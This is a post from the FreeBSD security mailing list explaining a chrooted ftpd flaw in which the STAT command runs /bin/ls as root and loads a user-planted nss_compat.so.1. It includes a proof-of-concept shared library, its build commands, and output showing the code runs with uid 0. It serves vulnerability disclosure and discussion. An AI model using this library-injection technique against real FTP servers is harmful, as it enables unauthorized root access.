Re: ftpd security issue ?
> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html
This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is
loaded by libc regardless of elevated privileges.
This can be proven by creating dummy ~/lib/nss_compat.so.1:
[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>
void _init() {
FILE *fp = fopen("asdf", "w+");
fprintf(fp, "%d %d\n", getuid(), geteuid());
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o
-nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1
And after calling STAT command:
[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000
BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists
or anonymous user is allowed to create files inside etc and lib dirs.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
討論串 (同標題文章)
完整討論串 (本文為第 2 之 18 篇):